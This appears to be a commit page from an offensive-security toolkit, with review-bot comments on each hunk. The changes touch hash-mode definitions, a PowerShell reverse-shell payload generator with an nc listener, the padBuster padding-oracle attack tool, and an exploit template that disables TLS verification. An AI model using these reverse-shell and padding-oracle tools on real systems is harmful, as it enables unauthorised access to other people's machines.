Update
parent
2f555c5b9e
commit
718aaa6f6c
@ -33,6 +33,8 @@ class HashType(enum.Enum):
|
||||
RAW_SHA2_256 = 1400
|
||||
SHA256_PASS_SALT = 1410
|
||||
SHA256_SALT_PASS = 1420
|
||||
HMAC_SHA256_PASS = 1450
|
||||
HMAC_SHA256_SALT = 1460
|
||||
RAW_SHA2_384 = 10800
|
||||
RAW_SHA2_512 = 1700
|
||||
SHA512_PASS_SALT = 1710
|
||||
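Review bot: The two new members `HMAC_SHA256_PASS` and `HMAC_SHA256_SALT` do not say which input is the HMAC key, unlike `SHA256_PASS_SALT` / `SHA256_SALT_PASS`, where the name spells out the order. The values look like hashcat mode numbers, where 1450 is keyed by the password and 1460 by the salt, so a trailing comment would remove the ambiguity: `HMAC_SHA256_PASS = 1450  # HMAC-SHA256, key = password` and `HMAC_SHA256_SALT = 1460  # HMAC-SHA256, key = salt`. The enum body continues outside the hunk, so confirm the same convention against the other HMAC entries, if any.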
@ -181,6 +183,8 @@ class Hash:
|
||||
if self.isSalted:
|
||||
self.type.append(HashType.SHA256_PASS_SALT)
|
||||
self.type.append(HashType.SHA256_SALT_PASS)
|
||||
self.type.append(HashType.HMAC_SHA256_PASS)
|
||||
self.type.append(HashType.HMAC_SHA256_SALT)
|
||||
else:
|
||||
self.type.append(HashType.RAW_SHA2_256)
|
||||
self.type.append(HashType.RAW_SHA3_256)
|
||||
|
@ -36,13 +36,16 @@ def generatePayload(type, local_address, port):
|
||||
payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
|
||||
return f"powershell.exe -exec bypass -enc {payload_encoded}"
|
||||
|
||||
def spawn_listener(port):
|
||||
pty.spawn(["nc", "-lvvp", str(port)])
|
||||
|
||||
def triggerShell(func, port):
|
||||
def _wait_and_exec():
|
||||
time.sleep(1.5)
|
||||
func()
|
||||
|
||||
threading.Thread(target=_wait_and_exec).start()
|
||||
pty.spawn(["nc", "-lvvp", str(port)])
|
||||
spawn_listener(port)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
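Review bot: The extracted helper `spawn_listener` is snake_case while its neighbours `generatePayload` and `triggerShell` are camelCase, and it has no docstring. Either rename it to match the module (`spawnListener`) or settle on one convention, and add a short docstring such as `"""Run an interactive nc listener on the given TCP port; blocks until nc exits."""`. The docstring should also say that the `nc -lvvp` invocation names no bind address, so the listener accepts connections on every interface the host has. `generatePayload` in the hunk header also takes a parameter named `type`, which shadows the builtin; its body is outside the hunk.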
2
padBuster.pl
Normal file → Executable file
2
padBuster.pl
Normal file → Executable file
@ -527,7 +527,7 @@ sub processBlock {
|
||||
|
||||
my $continue = "y";
|
||||
|
||||
if (($error && $content !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
|
||||
if (($error && $content !~ /$error/ && $location !~ /$error/) || ($oracleSignature ne "" && $oracleSignature ne $signatureData)) {
|
||||
# This is for autoretry logic (only works on the first byte)
|
||||
if ($autoRetry == 1 && ($byteNum == ($blockSize - 1) ) && $hasHit == 0 ) {
|
||||
$hasHit++;
|
||||
|
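Review bot: `$location` is not assigned anywhere in this hunk, so if it can be undefined for responses that carry no Location header, the added `$location !~ /$error/` test will emit uninitialized-value warnings when warnings are enabled. A defaulted operand, `(defined $location ? $location : "") !~ /$error/`, keeps the result the same and silences that. `$error` is interpolated as a pattern in both tests, so regex metacharacters in the configured error string are not matched literally; if a literal match is intended, `/\Q$error\E/` says so. The comment above the condition should mention that the error string is now checked against the redirect target as well as the body. `processBlock` starts and ends outside the hunk.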
30
template.py
30
template.py
@ -5,36 +5,34 @@ import sys
|
||||
def generateTemplate(baseUrl):
|
||||
template = """#!/usr/bin/env python
|
||||
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
import base64
|
||||
import requests
|
||||
import subprocess
|
||||
import urllib.parse
|
||||
from bs4 import BeautifulSoup
|
||||
from hackingscripts import util, fileserver
|
||||
from hackingscripts import util, fileserver, genRevShell
|
||||
|
||||
from urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
|
||||
|
||||
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
|
||||
USERNAME = "admin"
|
||||
PASSWORD = "password"
|
||||
|
||||
def login(username, password):
|
||||
session = requests.Session()
|
||||
post_data = { "username": username, "password": password }
|
||||
res = session.post(f"{BASE_URL}/login", data=post_data, allow_redirects=False)
|
||||
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
|
||||
print("Login failed")
|
||||
exit()
|
||||
return session
|
||||
def request(method, uri, **kwargs):
|
||||
if not uri.startswith("/") and uri != "":
|
||||
uri = "/" + uri
|
||||
|
||||
def exploit(session, payload):
|
||||
# Template method to exploit an endpoint
|
||||
pass
|
||||
client = requests
|
||||
if "session" in kwargs:
|
||||
client = kwargs["session"]
|
||||
del kwargs["session"]
|
||||
|
||||
return client.request(method, BASE_URL + uri, verify=False, allow_redirects=False, **kwargs)
|
||||
|
||||
if __name__ == "__main__":
|
||||
session = login(USERNAME, PASSWORD)
|
||||
exploit(session, "id")
|
||||
pass
|
||||
""" % baseUrl
|
||||
|
||||
return template
|
||||
|
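Review bot: In the generated `request()` helper, `verify=False` and `allow_redirects=False` are passed as literal keywords next to `**kwargs`, so a caller who supplies either one gets `TypeError: got multiple values for keyword argument` instead of an override. Making them defaults fixes that: `kwargs.setdefault("verify", False)`, `kwargs.setdefault("allow_redirects", False)`, and `client = kwargs.pop("session", requests)` in place of the `in`/`del` pair. The template also appears to suppress `InsecureRequestWarning` globally, so every script generated from it sends `USERNAME`/`PASSWORD` over a connection whose certificate is never checked and says nothing about it. A comment in the template should state that this is only acceptable against a lab target. The old/new markers are lost on this page, so which of `login`, `exploit` and `request` survive in the new template is inferred from the interleaving.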